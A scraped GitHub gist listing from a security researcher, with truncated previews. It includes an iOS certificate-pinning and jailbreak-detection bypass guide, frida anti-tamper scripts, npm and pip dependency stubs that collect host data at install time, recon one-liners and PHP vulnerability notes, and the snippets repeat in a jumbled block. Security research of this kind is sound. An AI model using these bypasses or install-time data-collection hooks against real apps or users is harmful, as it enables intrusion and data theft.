rodnt (0x5244) rodnt

## ios14-certificate-pinning-bypass.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                rodnt
                / ios14-certificate-pinning-bypass.md
            
            
              Created
              March 19, 2022 12:00
                — forked from AkdM/ios14-certificate-pinning-bypass.md
            
              
                iOS 14 app TLS decrypt / certificate pinning bypass steps
              
          
    This is not a tutorial, just a small guide to myself but feel free to get some infos here.
Working on an iPhone 7 running iOS 14.5.1


Jailbreak an iPhone/iPad/whatever


If necessary, you'll need to bypass Jailbreak detection for some apps with tweaks like A-Bypass, Hestia, HideJB, etc.


Get the PID of the app you want to capture traffic from with frida-ps -Ua ( a is for showing running apps only, you can -U to show all running processes instead)


## bypassAntiTamper.js
/**
 *  Rodolfo 'rodx00' Tavares
 *  twitter @0xrodnt
 *  github rodnt
 */

if(ObjC.available) {

    const tamperLibs = [
        "Substrate",

## npm_dependency.js
const os = require("os");
const dns = require("dns");
const querystring = require("querystring");
const https = require("https");
const packageJSON = require("./package.json");
const package = packageJSON.name;

const trackingData = JSON.stringify({
    p: package,
    c: __dirname,

## pip_dependency.py
from setuptools import setup
from setuptools.command.install import install
import requests
import socket
import getpass
import os

class CustomInstall(install):
    def run(self):
        install.run(self)

## fridaUtils.js

/**
 *
 * Author: __rodx00__
 *
 * Usefull functions while reversing frida scripts.
 */

function bin2ascii(array) {
var result = [];

## verify_CVE-2017-13156.sh
#!/bin/bash

me=`basename "$0"`
echo ":: verify CVE-2017-13156 ::"
echo ":: USAGE  bash $me <filename_.apk> "
command -v apksigner >/dev/null 2>&1 || { echo >&2 "apksigner not in \$PATH.  Aborting."; exit 1; }
command -v apktool >/dev/null 2>&1 || { echo >&2 "apktool not in \$PATH.  Aborting."; exit 1; }
file=$1

echo "verifing signatures"

## open_activities.py
import sys
from sys import exit
import os
import time
"""

Using objection and dumping all activities with

android hooking list activities

## One_Liners.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                rodnt
                / One_Liners.md
            
            
              Created
              August 6, 2022 17:45
            
              
                One liners 
              
          
Recon crt.sh
curl -s https://crt.sh\?O=\%.google.com\&amp;output\=json | jq -r '.[].name_value' | sed 's/*.//g' | sort -u


## php_code_review_notes.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                rodnt
                / php_code_review_notes.md
            
            
              Last active
              August 14, 2022 23:31
            
              
                Code review PHP functions
              
          
Path traversal ( these functions can be used to read files )

functions

readfile()
file_get_contents()
fopen()
fread()
fgets()


Server Side Request Forgery ( SSRF )


## wordpress_plugins.py
from shutil import ExecError
import requests
from bs4 import BeautifulSoup
import os
import wget
from concurrent.futures import ThreadPoolExecutor
import zipfile

def wordpress_plugin():
    urls = []
	/**
	* Rodolfo 'rodx00' Tavares
	* twitter @0xrodnt
	* github rodnt
	*/

	if(ObjC.available) {

	const tamperLibs = [
	"Substrate",
	const os = require("os");
	const dns = require("dns");
	const querystring = require("querystring");
	const https = require("https");
	const packageJSON = require("./package.json");
	const package = packageJSON.name;

	const trackingData = JSON.stringify({
	p: package,
	c: __dirname,
	from setuptools import setup
	from setuptools.command.install import install
	import requests
	import socket
	import getpass
	import os

	class CustomInstall(install):
	def run(self):
	install.run(self)

	/**
	*
	* Author: __rodx00__
	*
	* Usefull functions while reversing frida scripts.
	*/

	function bin2ascii(array) {
	var result = [];
	#!/bin/bash

	me=`basename "$0"`
	echo ":: verify CVE-2017-13156 ::"
	echo ":: USAGE bash $me <filename_.apk> "
	command -v apksigner >/dev/null 2>&1 \|\| { echo >&2 "apksigner not in \$PATH. Aborting."; exit 1; }
	command -v apktool >/dev/null 2>&1 \|\| { echo >&2 "apktool not in \$PATH. Aborting."; exit 1; }
	file=$1

	echo "verifing signatures"
	import sys
	from sys import exit
	import os
	import time
	"""

	Using objection and dumping all activities with

	android hooking list activities
	from shutil import ExecError
	import requests
	from bs4 import BeautifulSoup
	import os
	import wget
	from concurrent.futures import ThreadPoolExecutor
	import zipfile

	def wordpress_plugin():
	urls = []